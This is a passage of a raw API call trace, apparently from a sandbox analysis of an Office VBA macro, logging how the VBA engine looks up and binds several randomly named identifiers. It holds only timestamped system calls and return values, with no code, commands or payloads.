lpWideCharStr="UZBAAAk") returned 8 [0068.844] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.844] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="UZBAAAk", lHashVal=0x1028fe, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.844] IUnknown:Release (This=0x665ba50) returned 0xd [0068.844] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.844] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="UZBAAAk", lHashVal=0x1028fe, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.844] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.844] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.844] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="UZBAAAk", lHashVal=0x1028fe, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.844] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.844] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.844] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="UZBAAAk", lHashVal=0x1028fe, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.844] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61152, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="UZBAAAk") returned 8 [0068.844] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="UZBAAAk", lHashVal=0x1028fe, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.844] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.844] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61152 | out: _Dst=0x67c2d40) returned 0x0 [0068.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_UZBAAAk") returned 0x102c82 [0068.844] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_UZBAAAk" | out: _Dst="_B_var_UZBAAAk") returned 0x0 [0068.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_UZBAAAk") returned 15 [0068.844] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.844] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_UZBAAAk", lHashVal=0x102c82, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.844] IUnknown:Release (This=0x665ba50) returned 0xd [0068.845] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.845] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_UZBAAAk", lHashVal=0x102c82, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.845] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.845] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.845] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_UZBAAAk", lHashVal=0x102c82, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.845] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.845] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.845] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_UZBAAAk", lHashVal=0x102c82, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.845] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.845] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.845] IUnknown:Release (This=0x665ba50) returned 0xd [0068.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2b0a, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_UZBAAAk") returned 15 [0068.845] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_UZBAAAk", lHashVal=0x102c82, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.845] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61152 | out: _Dst=0x144ec0) returned 0x0 [0068.845] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0068.845] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.845] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.845] IUnknown:Release (This=0x665ba50) returned 0xd [0068.845] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.845] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.845] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.845] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.845] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.846] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.846] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.846] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.846] IUnknown:Release (This=0x665ba50) returned 0xd [0068.846] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.846] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.846] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.846] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.846] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.846] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.846] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.846] IUnknown:Release (This=0x665ba50) returned 0xd [0068.846] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.846] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.846] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.846] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.846] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.846] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.846] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.846] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.846] IUnknown:Release (This=0x665ba50) returned 0xd [0068.846] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.847] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.847] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.847] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.847] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.847] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.847] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.847] IUnknown:Release (This=0x665ba50) returned 0xd [0068.847] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.847] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.847] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.847] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.847] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.847] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.847] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.847] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.847] IUnknown:Release (This=0x665ba50) returned 0xd [0068.847] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.847] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.847] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.847] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.847] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.847] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.847] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.847] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.848] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.848] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.848] IUnknown:Release (This=0x665ba50) returned 0xd [0068.848] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.848] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.848] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.848] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.848] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.848] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.848] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.848] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.848] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.848] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.848] IUnknown:Release (This=0x665ba50) returned 0xd [0068.848] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.848] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.848] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a610a2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="b4AACAoX") returned 9 [0068.848] ITypeComp:RemoteBind (in: This=0x665ba60, szName="b4AACAoX", lHashVal=0x10ed79, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a610a2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="b4AACAoX") returned 9 [0068.848] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="b4AACAoX", lHashVal=0x10ed79, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a610a2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="b4AACAoX") returned 9 [0068.849] ITypeComp:RemoteBind (in: This=0x665bd30, szName="b4AACAoX", lHashVal=0x10ed79, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b4AACAoX") returned 0x10ed79 [0068.849] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="b4AACAoX" | out: _Dst="b4AACAoX") returned 0x0 [0068.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="b4AACAoX") returned 9 [0068.849] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.849] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="b4AACAoX", lHashVal=0x10ed79, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.849] IUnknown:Release (This=0x665ba50) returned 0xd [0068.849] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.849] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="b4AACAoX", lHashVal=0x10ed79, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.849] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.849] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.849] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="b4AACAoX", lHashVal=0x10ed79, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.849] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.849] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.849] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="b4AACAoX", lHashVal=0x10ed79, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.849] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a610a2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="b4AACAoX") returned 9 [0068.849] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="b4AACAoX", lHashVal=0x10ed79, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.849] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.849] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a610a2 | out: _Dst=0x67c2d40) returned 0x0 [0068.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_b4AACAoX") returned 0x10c502 [0068.849] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_b4AACAoX" | out: _Dst="_B_var_b4AACAoX") returned 0x0 [0068.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_b4AACAoX") returned 16 [0068.850] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.850] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_b4AACAoX", lHashVal=0x10c502, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.850] IUnknown:Release (This=0x665ba50) returned 0xd [0068.850] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.850] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_b4AACAoX", lHashVal=0x10c502, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.850] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.850] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.850] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_b4AACAoX", lHashVal=0x10c502, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.850] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.850] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.850] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_b4AACAoX", lHashVal=0x10c502, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.850] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.850] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.850] IUnknown:Release (This=0x665ba50) returned 0xd [0068.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2b3a, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_b4AACAoX") returned 16 [0068.850] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_b4AACAoX", lHashVal=0x10c502, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x43004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x43004100000000, pDummy=0x0) returned 0x0 [0068.850] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a610a2 | out: _Dst=0x144ec0) returned 0x0 [0068.850] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a611a2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aXACAG") returned 7 [0068.850] ITypeComp:RemoteBind (in: This=0x665ba60, szName="aXACAG", lHashVal=0x107d21, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 